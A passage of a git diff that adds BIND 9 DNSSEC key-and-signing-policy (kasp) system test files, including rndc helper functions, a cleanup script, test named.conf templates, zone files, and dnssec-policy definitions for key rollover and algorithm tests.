dnssec -checkds${_keycmd}${_whencmd} ${_what} zone ${_zone} failed" + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Tell named to schedule a key rollover. +rndc_rollover() { + _server=$1 + _dir=$2 + _keyid=$3 + _when=$4 + _zone=$5 + _view=$6 + + _whencmd="" + if [ "${_when}" != "now" ]; then + _whencmd="-when ${_when}" + fi + + n=$((n+1)) + echo_i "calling rndc dnssec -rollover key ${_keyid} ${_whencmd} zone ${_zone} ($n)" + ret=0 + + _rndccmd $_server dnssec -rollover -key $_keyid $_whencmd $_zone in $_view > rndc.dnssec.rollover.out.$_zone.$n || _log_error "rndc dnssec -rollover (key ${_keyid} when ${_when}) zone ${_zone} failed" + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} diff --git a/bin/tests/system/kasp/README b/bin/tests/system/kasp/README new file mode 100644 index 0000000..96b0ef7 --- /dev/null +++ b/bin/tests/system/kasp/README @@ -0,0 +1,23 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +The test setup for the KASP tests. + +ns1 is reserved for the root server. + +ns2 is running primary service for ns3. + +ns3 is an authoritative server for the various test domains. + +ns4 and ns5 are authoritative servers for various test domains related to views. + +ns6 is an authoritative server that tests changes in dnssec-policy (algorithm +rollover). diff --git a/bin/tests/system/kasp/clean.sh b/bin/tests/system/kasp/clean.sh new file mode 100644 index 0000000..db264c2 --- /dev/null +++ b/bin/tests/system/kasp/clean.sh @@ -0,0 +1,36 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f ./keygen.* +rm -f ./K*.private ./K*.key ./K*.state ./K*.cmp +rm -rf ./keys/ +rm -f dig.out* rrsig.out.* keyevent.out.* verify.out.* zone.out.* +rm -f ns*/named.conf ns*/named.memstats ns*/named.run* +rm -f ns*/named-fips.conf +rm -f ns*/policies/*.conf +rm -f ns*/*.jnl ns*/*.jbk +rm -f ns*/K*.private ns*/K*.key ns*/K*.state +rm -f ns*/dsset-* ns*/*.db ns*/*.db.signed +rm -f ns*/keygen.out.* ns*/settime.out.* ns*/signer.out.* +rm -f ns*/managed-keys.bind +rm -f ns*/*.mkeys +rm -f ns*/zones ns*/*.db.infile +rm -f ns*/*.zsk1 ns*/*.zsk2 +rm -f ns3/legacy-keys.* +rm -f *.created published.test* retired.test* +rm -f rndc.dnssec.*.out.* rndc.zonestatus.out.* +rm -f python.out.* +rm -f *-supported.file +rm -f created.key-* unused.key-* diff --git a/bin/tests/system/kasp/kasp.conf b/bin/tests/system/kasp/kasp.conf new file mode 100644 index 0000000..e7a2eab --- /dev/null +++ b/bin/tests/system/kasp/kasp.conf @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * This is just a random selection of configuration options. + */ + +dnssec-policy "kasp" { + dnskey-ttl 200; + + keys { + csk key-directory lifetime P1Y algorithm 13; + ksk key-directory lifetime P1Y algorithm 8; + zsk key-directory lifetime P30D algorithm 8 2048; + zsk key-directory lifetime P6M algorithm 8 3072; + }; +}; diff --git a/bin/tests/system/kasp/ns2/named.conf.in b/bin/tests/system/kasp/ns2/named.conf.in new file mode 100644 index 0000000..4b673c4 --- /dev/null +++ b/bin/tests/system/kasp/ns2/named.conf.in @@ -0,0 +1,61 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + dnssec-policy "none"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* Inherit dnssec-policy (which is none) */ + +zone "unsigned.tld" { + type primary; + file "unsigned.tld.db"; +}; + +/* Override dnssec-policy */ + +zone "signed.tld" { + type primary; + file "signed.tld.db"; + dnssec-policy "default"; + inline-signing yes; +}; + +/* Primary service for ns3 */ + +zone "secondary.kasp" { + type primary; + file "secondary.kasp.db"; + allow-transfer { 10.53.0.3; }; + notify yes; +}; diff --git a/bin/tests/system/kasp/ns2/secondary.kasp.db.in b/bin/tests/system/kasp/ns2/secondary.kasp.db.in new file mode 100644 index 0000000..3c8d124 --- /dev/null +++ b/bin/tests/system/kasp/ns2/secondary.kasp.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA secondary.kasp. hostmaster.kasp. ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/kasp/ns2/secondary.kasp.db.in2 b/bin/tests/system/kasp/ns2/secondary.kasp.db.in2 new file mode 100644 index 0000000..9289831 --- /dev/null +++ b/bin/tests/system/kasp/ns2/secondary.kasp.db.in2 @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA secondary.kasp. hostmaster.kasp. ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.11 +b A 10.0.0.2 +c A 10.0.0.3 +d A 10.0.0.4 + diff --git a/bin/tests/system/kasp/ns2/setup.sh b/bin/tests/system/kasp/ns2/setup.sh new file mode 100644 index 0000000..3890d52 --- /dev/null +++ b/bin/tests/system/kasp/ns2/setup.sh @@ -0,0 +1,35 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +echo_i "ns2/setup.sh" + +zone="secondary.kasp" +echo_i "setting up zone: $zone" +zonefile="${zone}.db" +infile="${zonefile}.in" +cp $infile $zonefile + +zone="signed.tld" +echo_i "setting up zone: $zone" +zonefile="${zone}.db" +infile="template.tld.db.in" +cp $infile $zonefile + +zone="unsigned.tld" +echo_i "setting up zone: $zone" +zonefile="${zone}.db" +infile="template.tld.db.in" +cp $infile $zonefile diff --git a/bin/tests/system/kasp/ns2/template.tld.db.in b/bin/tests/system/kasp/ns2/template.tld.db.in new file mode 100644 index 0000000..400dc34 --- /dev/null +++ b/bin/tests/system/kasp/ns2/template.tld.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA secondary.kasp. hostmaster.kasp. ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/kasp/ns3/ed25519.conf b/bin/tests/system/kasp/ns3/ed25519.conf new file mode 100644 index 0000000..999fa2f --- /dev/null +++ b/bin/tests/system/kasp/ns3/ed25519.conf @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "ed25519" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 15; + zsk key-directory lifetime P5Y algorithm 15; + zsk key-directory lifetime P1Y algorithm 15 256; + }; +}; + +zone "ed25519.kasp" { + type primary; + file "ed25519.kasp.db"; + inline-signing yes; + dnssec-policy "ed25519"; +}; diff --git a/bin/tests/system/kasp/ns3/ed448.conf b/bin/tests/system/kasp/ns3/ed448.conf new file mode 100644 index 0000000..e9c8312 --- /dev/null +++ b/bin/tests/system/kasp/ns3/ed448.conf @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "ed448" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 16; + zsk key-directory lifetime P5Y algorithm 16; + zsk key-directory lifetime P1Y algorithm 16 456; + }; +}; + +zone "ed448.kasp" { + type primary; + file "ed448.kasp.db"; + inline-signing yes; + dnssec-policy "ed448"; +}; diff --git a/bin/tests/system/kasp/ns3/named-fips.conf.in b/bin/tests/system/kasp/ns3/named-fips.conf.in new file mode 100644 index 0000000..b14b142 --- /dev/null +++ b/bin/tests/system/kasp/ns3/named-fips.conf.in @@ -0,0 +1,519 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +include "policies/kasp.conf"; +include "policies/autosign.conf"; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + dnssec-policy "rsasha256"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm @DEFAULT_HMAC@; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* Zones that are getting initially signed */ + +/* The default case: No keys created, using default policy. */ +zone "default.kasp" { + type primary; + file "default.kasp.db"; + inline-signing yes; + dnssec-policy "default"; +}; + +/* checkds: Zone with one KSK. */ +zone "checkds-ksk.kasp" { + type primary; + file "checkds-ksk.kasp.db"; + inline-signing yes; + dnssec-policy "checkds-ksk"; +}; + +/* checkds: Zone with two KSKs. */ +zone "checkds-doubleksk.kasp" { + type primary; + file "checkds-doubleksk.kasp.db"; + inline-signing yes; + dnssec-policy "checkds-doubleksk"; +}; + +/* checkds: Zone with one CSK. */ +zone "checkds-csk.kasp" { + type primary; + file "checkds-csk.kasp.db"; + inline-signing yes; + dnssec-policy "checkds-csk"; +}; + +/* Key lifetime unlimited. */ +zone "unlimited.kasp" { + type primary; + file "unlimited.kasp.db"; + inline-signing yes; + dnssec-policy "unlimited"; +}; + +/* Manual rollover. */ +zone "manual-rollover.kasp" { + type primary; + file "manual-rollover.kasp.db"; + inline-signing yes; + dnssec-policy "manual-rollover"; +}; + +/* A zone that inherits dnssec-policy. */ +zone "inherit.kasp" { + type primary; + inline-signing yes; + file "inherit.kasp.db"; +}; + +/* A zone that overrides dnssec-policy. */ +zone "unsigned.kasp" { + type primary; + file "unsigned.kasp.db"; + inline-signing yes; + dnssec-policy "none"; +}; + +/* A zone that is initially set to insecure. */ +zone "insecure.kasp" { + type primary; + file "insecure.kasp.db"; + inline-signing yes; + dnssec-policy "insecure"; +}; + +/* A primary zone with dnssec-policy but keys already created. */ +zone "dnssec-keygen.kasp" { + type primary; + file "dnssec-keygen.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* A secondary zone with dnssec-policy. */ +zone "secondary.kasp" { + type secondary; + primaries { 10.53.0.2; }; + file "secondary.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* A dynamic zone with dnssec-policy. */ +zone "dynamic.kasp" { + type primary; + file "dynamic.kasp.db"; + dnssec-policy "default"; + allow-update { any; }; +}; + +/* A dynamic inline-signed zone with dnssec-policy. */ +zone "dynamic-inline-signing.kasp" { + type primary; + file "dynamic-inline-signing.kasp.db"; + dnssec-policy "default"; + allow-update { any; }; + inline-signing yes; +}; + +/* An inline-signed zone with dnssec-policy. */ +zone "inline-signing.kasp" { + type primary; + file "inline-signing.kasp.db"; + dnssec-policy "default"; + inline-signing yes; +}; + +/* + * A configured dnssec-policy but some keys already created. + */ +zone "some-keys.kasp" { + type primary; + file "some-keys.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* + * A configured dnssec-policy but some keys already in use. + */ +zone "legacy-keys.kasp" { + type primary; + file "legacy-keys.kasp.db"; + inline-signing yes; + dnssec-policy "migrate-to-dnssec-policy"; +}; + +/* + * A configured dnssec-policy with (too) many keys pregenerated. + */ +zone "pregenerated.kasp" { + type primary; + file "pregenerated.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* + * A configured dnssec-policy with one rumoured key. + * Bugfix case for GL #1593. + */ +zone "rumoured.kasp" { + type primary; + file "rumoured.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +/* RFC 8901 Multi-signer Model 2. */ +zone "multisigner-model2.kasp" { + type primary; + file "multisigner-model2.kasp.db"; + dnssec-policy "multisigner-model2"; + allow-update { any; }; +}; + +/* + * Different algorithms. + */ +zone "rsasha256.kasp" { + type primary; + file "rsasha256.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; +zone "rsasha512.kasp" { + type primary; + file "rsasha512.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha512"; +}; +zone "ecdsa256.kasp" { + type primary; + file "ecdsa256.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; +zone "ecdsa384.kasp" { + type primary; + file "ecdsa384.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa384"; +}; + +/* + * Zone with too high TTL. + */ +zone "max-zone-ttl.kasp" { + type primary; + file "max-zone-ttl.kasp.db"; + inline-signing yes; + dnssec-policy "ttl"; +}; + +/* + * Zone for testing GL #2375: Three is a crowd. + */ +zone "three-is-a-crowd.kasp" { + type primary; + file "three-is-a-crowd.kasp.db"; + inline-signing yes; + /* Use same policy as KSK rollover test zones. */ + dnssec-policy "ksk-doubleksk"; +}; + +/* + * Zones in different signing states. + */ + +/* + * Zone that has expired signatures. + */ +zone "expired-sigs.autosign" { + type primary; + file "expired-sigs.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has valid, fresh signatures. + */ +zone "fresh-sigs.autosign" { + type primary; + file "fresh-sigs.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has unfresh signatures. + */ +zone "unfresh-sigs.autosign" { + type primary; + file "unfresh-sigs.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has missing private KSK. + */ +zone "ksk-missing.autosign" { + type primary; + file "ksk-missing.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has missing private ZSK. + */ +zone "zsk-missing.autosign" { + type primary; + file "zsk-missing.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zone that has inactive ZSK. + */ +zone "zsk-retired.autosign" { + type primary; + file "zsk-retired.autosign.db"; + inline-signing yes; + dnssec-policy "autosign"; +}; + +/* + * Zones for testing enabling DNSSEC. + */ +zone "step1.enable-dnssec.autosign" { + type primary; + file "step1.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; +zone "step2.enable-dnssec.autosign" { + type primary; + file "step2.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; +zone "step3.enable-dnssec.autosign" { + type primary; + file "step3.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; +zone "step4.enable-dnssec.autosign" { + type primary; + file "step4.enable-dnssec.autosign.db"; + inline-signing yes; + dnssec-policy "enable-dnssec"; +}; + +/* + * Zones for testing ZSK Pre-Publication steps. + */ +zone "step1.zsk-prepub.autosign" { + type primary; + file "step1.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step2.zsk-prepub.autosign" { + type primary; + file "step2.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step3.zsk-prepub.autosign" { + type primary; + file "step3.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step4.zsk-prepub.autosign" { + type primary; + file "step4.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step5.zsk-prepub.autosign" { + type primary; + file "step5.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; +zone "step6.zsk-prepub.autosign" { + type primary; + file "step6.zsk-prepub.autosign.db"; + inline-signing yes; + dnssec-policy "zsk-prepub"; +}; + +/* + * Zones for testing KSK Double-KSK steps. + */ +zone "step1.ksk-doubleksk.autosign" { + type primary; + file "step1.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step2.ksk-doubleksk.autosign" { + type primary; + file "step2.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step3.ksk-doubleksk.autosign" { + type primary; + file "step3.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step4.ksk-doubleksk.autosign" { + type primary; + file "step4.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step5.ksk-doubleksk.autosign" { + type primary; + file "step5.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; +zone "step6.ksk-doubleksk.autosign" { + type primary; + file "step6.ksk-doubleksk.autosign.db"; + inline-signing yes; + dnssec-policy "ksk-doubleksk"; +}; + +/* + * Zones for testing CSK rollover steps. + */ +zone "step1.csk-roll.autosign" { + type primary; + file "step1.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step2.csk-roll.autosign" { + type primary; + file "step2.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step3.csk-roll.autosign" { + type primary; + file "step3.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step4.csk-roll.autosign" { + type primary; + file "step4.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step5.csk-roll.autosign" { + type primary; + file "step5.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step6.csk-roll.autosign" { + type primary; + file "step6.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step7.csk-roll.autosign" { + type primary; + file "step7.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; +zone "step8.csk-roll.autosign" { + type primary; + file "step8.csk-roll.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll"; +}; + +zone "step1.csk-roll2.autosign" { + type primary; + file "step1.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step2.csk-roll2.autosign" { + type primary; + file "step2.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step3.csk-roll2.autosign" { + type primary; + file "step3.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step4.csk-roll2.autosign" { + type primary; + file "step4.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step5.csk-roll2.autosign" { + type primary; + file "step5.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step6.csk-roll2.autosign" { + type primary; + file "step6.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; +zone "step7.csk-roll2.autosign" { + type primary; + file "step7.csk-roll2.autosign.db"; + inline-signing yes; + dnssec-policy "csk-roll2"; +}; diff --git a/bin/tests/system/kasp/ns3/named.conf.in b/bin/tests/system/kasp/ns3/named.conf.in new file mode 100644 index 0000000..92e007d --- /dev/null +++ b/bin/tests/system/kasp/ns3/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +include "named-fips.conf"; + +zone "rsasha1.kasp" { + type primary; + file "rsasha1.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha1"; +}; + +zone "rsasha1-nsec3.kasp" { + type primary; + file "rsasha1-nsec3.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha1-nsec3"; +}; diff --git a/bin/tests/system/kasp/ns3/policies/autosign.conf.in b/bin/tests/system/kasp/ns3/policies/autosign.conf.in new file mode 100644 index 0000000..5564ec5 --- /dev/null +++ b/bin/tests/system/kasp/ns3/policies/autosign.conf.in @@ -0,0 +1,133 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "autosign" { + + signatures-refresh P1W; + signatures-validity P2W; + signatures-validity-dnskey P2W; + + dnskey-ttl 300; + + keys { + ksk key-directory lifetime P2Y algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime P1Y algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "enable-dnssec" { + + signatures-refresh P1W; + signatures-validity P2W; + signatures-validity-dnskey P2W; + + dnskey-ttl 300; + max-zone-ttl PT12H; + zone-propagation-delay PT5M; + retire-safety PT20M; + publish-safety PT5M; + + parent-propagation-delay 1h; + parent-ds-ttl 2h; + + keys { + csk lifetime unlimited algorithm @DEFAULT_ALGORITHM_NUMBER@; + }; +}; + +dnssec-policy "zsk-prepub" { + + signatures-refresh P1W; + signatures-validity P2W; + signatures-validity-dnskey P2W; + + dnskey-ttl 3600; + publish-safety P1D; + retire-safety P2D; + purge-keys PT1H; + + keys { + ksk key-directory lifetime P2Y algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime P30D algorithm @DEFAULT_ALGORITHM@; + }; + + zone-propagation-delay PT1H; + max-zone-ttl 1d; +}; + +dnssec-policy "ksk-doubleksk" { + + signatures-refresh P1W; + signatures-validity P2W; + signatures-validity-dnskey P2W; + + dnskey-ttl 2h; + publish-safety P1D; + retire-safety P2D; + purge-keys PT1H; + + keys { + ksk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime P1Y algorithm @DEFAULT_ALGORITHM@; + }; + + zone-propagation-delay PT1H; + max-zone-ttl 1d; + + parent-ds-ttl 3600; + parent-propagation-delay PT1H; +}; + +dnssec-policy "csk-roll" { + + signatures-refresh P5D; + signatures-validity 30d; + signatures-validity-dnskey 30d; + + dnskey-ttl 1h; + publish-safety PT1H; + retire-safety 2h; + purge-keys PT1H; + + keys { + csk key-directory lifetime P6M algorithm @DEFAULT_ALGORITHM@; + }; + + zone-propagation-delay 1h; + max-zone-ttl P1D; + + parent-ds-ttl 1h; + parent-propagation-delay 1h; +}; + +dnssec-policy "csk-roll2" { + + signatures-refresh 12h; + signatures-validity P1D; + signatures-validity-dnskey P1D; + + dnskey-ttl 1h; + publish-safety PT1H; + retire-safety 1h; + purge-keys 0; + + keys { + csk key-directory lifetime P6M algorithm @DEFAULT_ALGORITHM@; + }; + + zone-propagation-delay PT1H; + max-zone-ttl 1d; + + parent-ds-ttl PT1H; + parent-propagation-delay P1W; +}; diff --git a/bin/tests/system/kasp/ns3/policies/kasp-fips.conf.in b/bin/tests/system/kasp/ns3/policies/kasp-fips.conf.in new file mode 100644 index 0000000..90a92a2 --- /dev/null +++ b/bin/tests/system/kasp/ns3/policies/kasp-fips.conf.in @@ -0,0 +1,118 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +dnssec-policy "unlimited" { + dnskey-ttl 1234; + + keys { + csk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "manual-rollover" { + dnskey-ttl 3600; + + keys { + ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "multisigner-model2" { + dnskey-ttl 3600; + + keys { + ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "migrate-to-dnssec-policy" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P6M algorithm 8; + zsk key-directory lifetime P6M algorithm 8; + }; +}; + +dnssec-policy "rsasha256" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 8; + zsk key-directory lifetime P5Y algorithm 8; + zsk key-directory lifetime P1Y algorithm 8 3072; + }; +}; + +dnssec-policy "rsasha512" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 10; + zsk key-directory lifetime P5Y algorithm 10; + zsk key-directory lifetime P1Y algorithm 10 3072; + }; +}; + +dnssec-policy "ecdsa256" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 13; + zsk key-directory lifetime P5Y algorithm 13; + zsk key-directory lifetime P1Y algorithm 13 256; + }; +}; + +dnssec-policy "ecdsa384" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 14; + zsk key-directory lifetime P5Y algorithm 14; + zsk key-directory lifetime P1Y algorithm 14 384; + }; +}; + +dnssec-policy "checkds-ksk" { + dnskey-ttl 303; + + keys { + ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "checkds-doubleksk" { + dnskey-ttl 303; + + keys { + ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + zsk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "checkds-csk" { + dnskey-ttl 303; + + keys { + csk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@; + }; +}; + +dnssec-policy "ttl" { + 